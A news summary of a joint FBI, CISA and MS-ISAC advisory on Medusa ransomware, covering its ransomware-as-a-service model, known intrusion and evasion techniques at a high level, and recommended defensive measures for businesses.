Federal agencies in the US, including the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), have issued a joint advisory warning about a significant uptick in attacks by the Medusa ransomware. This advisory is part of the national #StopRansomware initiative, which aims to help organizations defend themselves against ransomware threats.
Medusa ransomware, a Ransomware-as-a-Service (RaaS) operation that was first discovered in 2021, has targeted over 300 entities across various industries such as healthcare, education, legal, insurance, technology, and manufacturing. What makes these attacks particularly dangerous is the utilization of double extortion tactics, where company data is encrypted and threatened to be publicly leaked unless a ransom is paid. Unlike some ransomware, Medusa operates centrally, with strict control over ransom negotiations and the recruitment of affiliates to spread the malware in exchange for a share of the ransom payments.
Affiliates of Medusa are offered potential payments ranging from $100 USD to $1 million USD, with the opportunity to work exclusively for the operation. These affiliates are known to employ common techniques to further the spread of the ransomware. The consequences of a Medusa ransomware attack for businesses can include disrupted operations, legal ramifications from leaked data, regulatory fines, and damage to their reputation. For IT and security teams, these attacks highlight vulnerabilities in unpatched systems and weak network segmentation.
Medusa actors gain access to networks through various means, including phishing campaigns to steal user credentials and exploit vulnerabilities in software like ScreenConnect (CVE-2024-1709) and Fortinet EMS (CVE-2023-48788). Once inside a network, Medusa utilizes tools like Advanced IP Scanner, PowerShell, and cmd.exe to identify valuable data to steal or encrypt. They also leverage legitimate remote management tools already present in victim environments to move stealthily.
To avoid detection, Medusa actors employ tactics such as PowerShell obfuscation, base64 encoding, and utilizing Windows tools like certutil to evade antivirus software. They disable endpoint detection tools, create firewall rules to maintain access, and use tools like Mimikatz to steal administrator credentials and spread within the network. In the event of an attack, they utilize Rclone for data exfiltration and the gaze.exe encryptor to lock files, adding a .medusa extension to encrypted files.
Business leaders and IT teams are advised to take immediate action to prevent or minimize the impact of a Medusa ransomware attack. This includes patching known vulnerabilities, segmenting networks, limiting inbound connections from unknown sources, implementing multifactor authentication, monitoring for abnormal activity, disabling unused remote management tools, backing up data offline, educating employees on phishing emails, and ensuring readiness through incident response plans.
The rise in ransomware attacks, including the Medusa ransomware, highlights the increasing threat to critical infrastructure and major business sectors. These attacks not only pose IT challenges but also significant business risks that can disrupt operations, supply chains, and compromise sensitive data. Executive teams are urged to conduct ransomware risk assessments, ensure critical patches are applied, review incident response plans, and stay informed about the latest threats through collaboration with law enforcement and industry groups.